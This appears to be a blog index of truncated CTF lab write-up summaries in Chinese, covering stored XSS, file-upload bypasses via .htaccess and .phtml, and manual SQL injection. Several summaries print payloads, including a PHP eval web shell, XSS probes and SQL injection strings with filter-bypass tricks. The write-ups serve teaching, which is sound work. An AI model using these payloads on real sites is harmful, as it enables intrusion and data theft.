摘要:
启动靶机 有留言板和登录功能,很明显是存储性xss,通过留言功能插入xss代码,获取cookie登录后台 先测试过滤 <script>alert(1);</script> 查看源代码发现script被过滤 <input onfocus="alert('xss');">好像只过滤了script 找一个 阅读全文
摘要:
打开靶机抓包发现过滤代码 发现.htaccess能上传后传入图片马 发现内容对<?进行过滤 我们换一种方式写后门代码 <script language="php">eval($_POST['cmd']);</script> 写入成功后发现没有回显 查资料发现可能使由于php版本过高不支持<scrip 阅读全文
摘要:
打开靶机,上传文件抓包 后缀不能带ph,大小写也无法绕过,意味着phtml后缀也无法上传 对后缀只过滤ph,我们转变思路上传图片马,用.htaccess使图片马以php格式打开 上传图片马 上传失败,试一试过滤了哪些字符 文件内容过滤了<? 我们尝试另一种写法后成功上传<script languag 阅读全文
摘要:
打开靶机,发现php后缀被过滤且发现没有文件包含漏洞 发现.phtml能绕过后缀检测,又显示没有图片 //PHTML 扩展名是 PHP 的一个模块,它允许在 HTML 文件中使用 PHP 代码,并且可以将 PHP 代码和 HTML 代码合并到一个文件中。 尝试在图片中加入gif文件头GIF89a发现 阅读全文
摘要:
启动靶机,发现有前端验证 先绕过前端验证,在burp中尝试发现验证在文件名后缀,且会重命名文件名 发现.ini能上传但是会被重命名,既然不像前端显示只有三种格式能上传,这里我们寻找能绕过的后缀 尝试发现phtml能上传成功 //PHTML 扩展名是 PHP 的一个模块,它允许在 HTML 文件中使用 阅读全文
摘要:
启动靶机 很明显注入点为id值,单引号闭合影响语句,说明为单引号闭合 构造注入语句 ?id=1 ' and 1 =1 --+ 发现没报错,说明没有其他过滤 ,开始sql注入 ?id=1 ' order by 4 --+ 直到=4报错说明有3个字节段 测试回显位2,3 ?id=1 ' and 1 = 阅读全文
摘要:
启动靶机熟悉的界面 测试发现or被过滤且输入#号无法起到注释作用 猜测本靶机考点过滤查询关键词语句or,union,select,and,by和注释符# 测试后查询关键词发现过滤只是单次过滤 可以使用aandnd,oorr,uunionnion等绕过过滤 而#则可以用urlencode编码格式变成% 阅读全文
摘要:
启动靶机 作者不建议使用sqlmap我们这里就进行手工注入 用万能口令登录 admin ' or 1 =1# ,详情见上文(https://www.cnblogs.com/m1saka1/p/18411197) 登录成功获得用户名和密码,发现密码并没有卵用,只能换思路利用账号密码的回显页面进行sql 阅读全文
摘要:
启动靶机,查看源码发现注入点只有登录框 首先测试查询是用单引号闭合还是双引号闭合,如图 显示查询没有报错,说明不是双引号闭合,接下来测试单引号 查询语句报错说明数值代入数据库查询是由单引号闭合,尝试构建万能语句绕过验证 admin' or 1 =1 # 获取flag flag{9d3c2f2d-a1 阅读全文
摘要:
方法一:手工注入 启动靶机 寻找注入点,使用burp抓包得到传参页面 得到注入点 /backend/content_detail.php?id=1 用and 1 =1 和 and 1 =2 判断存在sql注入漏洞 查询字段数 order by 2正常显示 order by 3异常显示 字段数为2 让 阅读全文